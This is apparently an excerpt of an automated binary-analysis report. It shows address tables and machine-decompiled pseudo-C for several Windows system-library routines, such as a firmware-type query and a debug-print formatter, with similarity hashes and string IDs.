






                                            0x012ee547
                                            0x012ee549
                                            0x012ee54f
                                            0x012ee553
                                            0x012ee557
                                            0x012ee55a
                                            0x012ee55c
                                            0x012ee55f
                                            0x012ee561
                                            0x012ee567
                                            0x012ee56b
                                            0x012ee7e2
                                            0x00000000
                                            0x012ee571
                                            0x012ee575
                                            0x012ee577
                                            0x012ee57b
                                            0x012ee57c
                                            0x012ee57d
                                            0x012ee57e
                                            0x012ee57f
                                            0x012ee588
                                            0x012ee58f
                                            0x012ee591
                                            0x012ee592
                                            0x012ee592
                                            0x012ee596
                                            0x012ee59e
                                            0x012ee5a0
                                            0x012ee5a6
                                            0x012ee61d
                                            0x012ee61d
                                            0x012ee621
                                            0x012ee623
                                            0x012ee630
                                            0x012ee630
                                            0x012ee7e6
                                            0x012ee7eb
                                            0x012ee7ed
                                            0x012ee7f4
                                            0x012ee7fa
                                            0x012ee7ff
                                            0x012ee7ff
                                            0x012ee80a
                                            0x012ee812
                                            0x012ee812
                                            0x012ee5ab
                                            0x012ee5b4
                                            0x012ee5b9
                                            0x012ee5be
                                            0x012ee5c0
                                            0x012ee5c2
                                            0x012ee5c8
                                            0x012ee5c9
                                            0x012ee5cb
                                            0x012ee5cc
                                            0x012ee5d5
                                            0x012ee5e4
                                            0x012ee5f1
                                            0x012ee5f8
                                            0x012ee5f8
                                            0x012ee5d5
                                            0x012ee602
                                            0x012ee616
                                            0x012ee63d
                                            0x012ee644
                                            0x012ee64d
                                            0x012ee652
                                            0x012ee657
                                            0x012ee659
                                            0x012ee65b
                                            0x012ee661
                                            0x012ee662
                                            0x012ee664
                                            0x012ee665
                                            0x012ee66e
                                            0x012ee67d
                                            0x012ee68a
                                            0x012ee691
                                            0x012ee691
                                            0x012ee66e
                                            0x012ee6b0
                                            0x00000000
                                            0x012ee6b6
                                            0x012ee6bd
                                            0x012ee6c7
                                            0x012ee6d7
                                            0x012ee6d9
                                            0x012ee6db
                                            0x012ee6de
                                            0x012ee6e3
                                            0x012ee6f3
                                            0x012ee6fc
                                            0x012ee700
                                            0x012ee700
                                            0x012ee704
                                            0x012ee70a
                                            0x012ee70a
                                            0x012ee713
                                            0x012ee716
                                            0x012ee719
                                            0x012ee720
                                            0x012ee761
                                            0x012ee76b
                                            0x012ee774
                                            0x012ee77a
                                            0x012ee77a
                                            0x012ee78a
                                            0x012ee791
                                            0x012ee799
                                            0x012ee79b
                                            0x012ee79f
                                            0x012ee7aa
                                            0x012ee7c0
                                            0x012ee7ac
                                            0x012ee7b2
                                            0x012ee7b9
                                            0x012ee7b9
                                            0x012ee7c7
                                            0x012ee806
                                            0x00000000
                                            0x012ee7c9
                                            0x012ee7d1
                                            0x012ee7d8
                                            0x00000000
                                            0x012ee7d8
                                            0x00000000
                                            0x00000000
                                            0x012ee722
                                            0x012ee72e
                                            0x012ee748
                                            0x012ee74c
                                            0x012ee754
                                            0x012ee756
                                            0x012ee75c
                                            0x012ee75c
                                            0x00000000
                                            0x012ee75c
                                            0x012ee758
                                            0x012ee758
                                            0x00000000
                                            0x012ee758
                                            0x012ee750
                                            0x00000000
                                            0x00000000
                                            0x012ee752
                                            0x00000000
                                            0x012ee752
                                            0x012ee730
                                            0x012ee735
                                            0x012ee73d
                                            0x012ee73f
                                            0x00000000
                                            0x00000000
                                            0x012ee741
                                            0x012ee741
                                            0x00000000
                                            0x012ee741
                                            0x012ee739
                                            0x00000000
                                            0x00000000
                                            0x012ee73b
                                            0x00000000
                                            0x012ee73b
                                            0x012ee722
                                            0x012ee720
                                            0x012ee6b0
                                            0x012ee618
                                            0x00000000
                                            0x012ee618

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction ID: 23cf4016b5fa5996d0d920e2922dfa20af07209b45ce853f1df275f7ece5c9de
                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction Fuzzy Hash: CE91D4712243429FE724CF29C849B2BBBE5BF84714F55892DF695CB290E774E804CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012A51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E012A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x13005f0);
				E0127D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0123EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E012A53CA(0);
						return E0127D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0126F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01243690(1, _t117, 0x1201810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0126AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01244620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0126AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E012A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01269860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                            0x012a51be
                                            0x012a51c3
                                            0x012a51c8
                                            0x012a51cd
                                            0x012a51d0
                                            0x012a51d3
                                            0x012a51d8
                                            0x012a51db
                                            0x012a51de
                                            0x012a51e0
                                            0x012a51e3
                                            0x012a51e6
                                            0x012a51e8
                                            0x012a5342
                                            0x012a5351
                                            0x012a5356
                                            0x012a535a
                                            0x012a5360
                                            0x012a5363
                                            0x012a5366
                                            0x012a5369
                                            0x012a5369
                                            0x012a536b
                                            0x012a536b
                                            0x012a5370
                                            0x012a53a3
                                            0x012a53a4
                                            0x012a53a6
                                            0x012a53ab
                                            0x012a53ab
                                            0x012a53ae
                                            0x012a53ae
                                            0x012a53b5
                                            0x012a53bf
                                            0x012a53bf
                                            0x012a5375
                                            0x012a5396
                                            0x012a53a0
                                            0x012a53a0
                                            0x00000000
                                            0x012a5396
                                            0x012a5377
                                            0x012a5379
                                            0x012a537f
                                            0x012a538c
                                            0x012a5390
                                            0x00000000
                                            0x012a5390
                                            0x012a51ee
                                            0x012a51f1
                                            0x012a5301
                                            0x012a5310
                                            0x012a5315
                                            0x012a5318
                                            0x012a531b
                                            0x012a5320
                                            0x012a532e
                                            0x012a5331
                                            0x00000000
                                            0x012a5331
                                            0x012a5328
                                            0x012a5329
                                            0x00000000
                                            0x012a5329
                                            0x012a51fa
                                            0x012a5235
                                            0x012a5236
                                            0x012a5239
                                            0x012a523f
                                            0x012a5240
                                            0x012a5241
                                            0x012a5242
                                            0x012a5246
                                            0x012a5247
                                            0x012a524e
                                            0x012a5251
                                            0x012a5267
                                            0x012a5269
                                            0x012a526e
                                            0x012a527d
                                            0x012a527e
                                            0x012a5281
                                            0x012a5282
                                            0x012a5287
                                            0x012a5288
                                            0x012a528a
                                            0x012a528f
                                            0x012a5294
                                            0x00000000
                                            0x00000000
                                            0x012a529a
                                            0x012a529c
                                            0x012a529e
                                            0x012a529e
                                            0x012a52a4
                                            0x012a52b0
                                            0x00000000
                                            0x00000000
                                            0x012a52ba
                                            0x012a52bc
                                            0x012a52bc
                                            0x012a52d4
                                            0x012a52d9
                                            0x012a52dc
                                            0x012a52e1
                                            0x00000000
                                            0x00000000
                                            0x012a52e7
                                            0x012a52f4
                                            0x00000000
                                            0x012a52f4
                                            0x012a5270
                                            0x00000000
                                            0x012a5270
                                            0x012a51fc
                                            0x012a51fd
                                            0x012a5202
                                            0x012a5203
                                            0x012a5205
                                            0x012a520a
                                            0x012a520f
                                            0x00000000
                                            0x00000000
                                            0x012a521b
                                            0x012a5226
                                            0x012a522b
                                            0x012a521d
                                            0x012a521d
                                            0x012a5222
                                            0x012a5222
                                            0x012a522d
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: b4da3115af1245653da0f5f005bf9427aedcd6e8139a813e9f26c4e530c2fe6e
                                            • Instruction ID: e9155f46ee4d17aada7f2aff260bd3a520d1623d50a95b63c52c7f361855792e
                                            • Opcode Fuzzy Hash: b4da3115af1245653da0f5f005bf9427aedcd6e8139a813e9f26c4e530c2fe6e
                                            • Instruction Fuzzy Hash: A2518DB1A206099FDB25DFA8C840BAEBBF8FF88700F54406DE609EB291D6719940CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0122B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E0122B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x12ff7a8);
				E0127D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0127D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0126D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0126F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0127DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0126B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0126B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0126E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0126A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                            0x0122b171
                                            0x0122b171
                                            0x0122b171
                                            0x0122b171
                                            0x0122b171
                                            0x0122b176
                                            0x0122b17b
                                            0x0122b180
                                            0x0122b186
                                            0x0122b18f
                                            0x0122b198
                                            0x0122b1a4
                                            0x0122b1aa
                                            0x01284802
                                            0x01284802
                                            0x01284805
                                            0x0128480c
                                            0x0128480e
                                            0x0122b1d1
                                            0x0122b1d3
                                            0x0122b1de
                                            0x0122b1de
                                            0x01284817
                                            0x0128481e
                                            0x01284820
                                            0x01284822
                                            0x01284822
                                            0x01284824
                                            0x01284824
                                            0x0128482a
                                            0x00000000
                                            0x00000000
                                            0x01284835
                                            0x0128483a
                                            0x0128483d
                                            0x0128483f
                                            0x01284842
                                            0x01284842
                                            0x01284842
                                            0x01284846
                                            0x0128484c
                                            0x0128484e
                                            0x01284851
                                            0x01284851
                                            0x01284853
                                            0x01284854
                                            0x01284854
                                            0x01284858
                                            0x0128485a
                                            0x0128485a
                                            0x0128485d
                                            0x0128485f
                                            0x01284861
                                            0x01284861
                                            0x01284866
                                            0x0128486b
                                            0x0128486e
                                            0x01284871
                                            0x01284876
                                            0x01284876
                                            0x01284878
                                            0x0128487b
                                            0x01284884
                                            0x01284884
                                            0x00000000
                                            0x0128487d
                                            0x0128487d
                                            0x01284882
                                            0x01284889
                                            0x01284889
                                            0x0128488f
                                            0x01284891
                                            0x012848e0
                                            0x012848e2
                                            0x012848e4
                                            0x012848e4
                                            0x012848e7
                                            0x012848e7
                                            0x012848ed
                                            0x012848f4
                                            0x012848f6
                                            0x01284951
                                            0x01284951
                                            0x01284953
                                            0x01284953
                                            0x01284956
                                            0x01284956
                                            0x01284958
                                            0x01284959
                                            0x01284959
                                            0x0128495d
                                            0x0128495d
                                            0x0128495f
                                            0x0128495f
                                            0x01284965
                                            0x01284969
                                            0x012849ba
                                            0x012849ba
                                            0x012849c1
                                            0x012849c5
                                            0x012849cc
                                            0x012849d4
                                            0x012849d7
                                            0x012849da
                                            0x012849e4
                                            0x012849e5
                                            0x012849f3
                                            0x01284a02
                                            0x00000000
                                            0x01284a02
                                            0x01284972
                                            0x01284974
                                            0x00000000
                                            0x00000000
                                            0x01284976
                                            0x01284979
                                            0x01284982
                                            0x01284983
                                            0x01284984
                                            0x0128498b
                                            0x0128498d
                                            0x01284991
                                            0x01284993
                                            0x01284999
                                            0x0128499d
                                            0x012849a2
                                            0x012849a2
                                            0x012849a2
                                            0x01284999
                                            0x012849ac
                                            0x00000000
                                            0x012849b3
                                            0x012848f8
                                            0x012848fe
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x012848fe
                                            0x01284895
                                            0x0128489c
                                            0x012848ad
                                            0x012848b2
                                            0x012848b5
                                            0x012848b7
                                            0x012848ba
                                            0x012848bc
                                            0x012848c6
                                            0x012848c6
                                            0x012848cb
                                            0x012848d1
                                            0x012848d4
                                            0x012848d8
                                            0x012848d8
                                            0x00000000
                                            0x012848d8
                                            0x012848be
                                            0x012848c0
                                            0x00000000
                                            0x00000000
                                            0x012848c2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x012848c4
                                            0x00000000
                                            0x01284882
                                            0x0128487b
                                            0x01284904
                                            0x01284906
                                            0x00000000
                                            0x00000000
                                            0x01284908
                                            0x0128490e
                                            0x00000000
                                            0x00000000
                                            0x01284910
                                            0x01284917
                                            0x01284917
                                            0x00000000
                                            0x01284917
                                            0x0122b1ba
                                            0x012847f9
                                            0x012847fc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x012847fc
                                            0x0122b1c0
                                            0x0122b1c0
                                            0x0122b1c3
                                            0x0122b1cb
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: _vswprintf_s
                                            • String ID:
                                            • API String ID: 677850445-0
                                            • Opcode ID: ebd447c1a2af970188a3fceded70ec1aebd737fabe3e4120c8b8cf874336fb43
                                            • Instruction ID: 3fd2483c510db2474acdd93b8127221424c7dc0ddee83d10062a05d2bd6afc63
                                            • Opcode Fuzzy Hash: ebd447c1a2af970188a3fceded70ec1aebd737fabe3e4120c8b8cf874336fb43
                                            • Instruction Fuzzy Hash: A951D371D3229B8BDF31EF68C845BBEBBB0AF04710F1141A9D959AB2C2D7704981CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0124B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 76%
                                            			E0124B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x131d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01247D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E012F8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01269E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0126B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0126CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01247D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E012F8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0126AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1318628; // 0x0
								_v68 = _t77;
								_t78 =  *0x131862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1318628; // 0x0
							_t116 =  *0x131862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                            0x0124b94c
                                            0x0124b956
                                            0x0124b95c
                                            0x0124b95e
                                            0x0124b964
                                            0x0124b969
                                            0x0124b96d
                                            0x0124b96d
                                            0x0124b970
                                            0x0124b974
                                            0x0124b97a
                                            0x0124badf
                                            0x0124badf
                                            0x0124bae2
                                            0x0124bae4
                                            0x0124bae6
                                            0x0124baf0
                                            0x01292cb8
                                            0x0124baf6
                                            0x0124baf6
                                            0x0124baf6
                                            0x0124bafd
                                            0x0124bb1f
                                            0x0124bb1f
                                            0x0124baff
                                            0x0124bb00
                                            0x0124bb00
                                            0x0124bb03
                                            0x0124bb03
                                            0x0124bacb
                                            0x0124bacf
                                            0x0124bad0
                                            0x0124bad1
                                            0x0124badc
                                            0x0124badc
                                            0x0124b980
                                            0x0124b980
                                            0x0124b988
                                            0x0124b98b
                                            0x0124b98d
